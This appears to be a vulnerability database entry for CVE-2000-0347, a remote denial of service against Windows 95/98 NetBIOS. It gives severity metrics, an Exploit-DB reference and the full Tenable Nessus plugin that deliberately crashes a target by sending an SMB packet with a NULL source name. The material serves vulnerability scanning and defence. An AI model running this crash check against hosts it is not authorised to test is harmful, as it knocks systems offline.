Vulnerabilities > CVE-2000-0347 - Unspecified vulnerability in Microsoft Windows 95 and Windows 98

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
microsoft
nessus
exploit available

Summary

Windows 95 and Windows 98 allow a remote attacker to cause a denial of service via a NetBIOS session request packet with a NULL source name.

Vulnerable Configurations

Part Description Count
OS
Microsoft
2

Exploit-Db

descriptionMicrosoft Windows 95/98 NetBIOS NULL Name Vulnerability. CVE-2000-0347. Remote exploit for windows platform
idEDB-ID:19889
last seen2016-02-02
modified2000-05-02
published2000-05-02
reporterrain forest puppy
sourcehttps://www.exploit-db.com/download/19889/
titleMicrosoft Windows 95/98 - NetBIOS NULL Name Vulnerability

Nessus

NASL familyWindows
NASL idRFPARALYZE.NASL
descriptionThe remote host appears to be running Microsoft Windows 95/98 The version of Windows installed on the remote host is vulnerable to the
last seen2020-06-01
modified2020-06-02
plugin id10392
published2000-05-03
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10392
titleMicrosoft Windows NetBIOS NULL Source Name Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#

# rfparalyze

include("compat.inc");

if (description)
{
 script_id(10392);
 script_version("1.30");
 script_cvs_date("Date: 2018/11/15 20:50:28");

 script_cve_id("CVE-2000-0347");
 script_bugtraq_id(1163);

 script_name(english:"Microsoft Windows NetBIOS NULL Source Name Remote DoS");
 script_summary(english:"Crash a host through winpopups");

 script_set_attribute(attribute:"synopsis", value:"The remote application is prone to denial of service attacks.");
 script_set_attribute(attribute:"description", value:
"The remote host appears to be running Microsoft Windows 95/98

The version of Windows installed on the remote host is vulnerable to
the 'winpopups' or 'rfparalyze' denial of service. A user can leverage
this issue to crash the remote host.

Note that Nessus crashed the remote host to test this flaw.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/May/23");
 script_set_attribute(attribute:"solution", value:"No patch available. Filter incoming traffic to this port.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2000/05/11");
 script_set_attribute(attribute:"plugin_publication_date", value:"2000/05/03");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
 script_family(english:"Windows");

 script_dependencie("netbios_name_get.nasl");
 script_require_keys("SMB/name", "Settings/ParanoidReport");
 script_require_ports(139);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("smb_func.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

name = string(get_kb_item("SMB/name"));
if (!name) exit(0);

port = 139;
if (!get_port_state(port)) exit(0);

soc = open_sock_tcp(port);
if (!soc) exit(0);

session_init(socket:soc, hostname:name);

called_name = netbios_encode(data:name, service:0x03);
calling_name = netbios_encode(data:"NESSUS", service:0x03);

data = ascii(string:called_name) + ascii(string:calling_name);

rep = netbios_sendrecv (type:0x81, data:data);
if (!rep || ord(rep[0]) != 0x82)
  exit(0);


header = smb_header (Command: 0xd0, Status: nt_status (Status: STATUS_SUCCESS));
parameters = smb_parameters (data:NULL);
data = smb_data (data:NULL);

packet = netbios_packet (header:header, parameters:parameters, data:data);

ret = smb_sendrecv (data:packet);
close(soc);

soc = open_sock_tcp(port);
if(!soc)
{
 security_hole(port);
 set_kb_item(name:"Host/dead", value:TRUE);
 exit(0);
}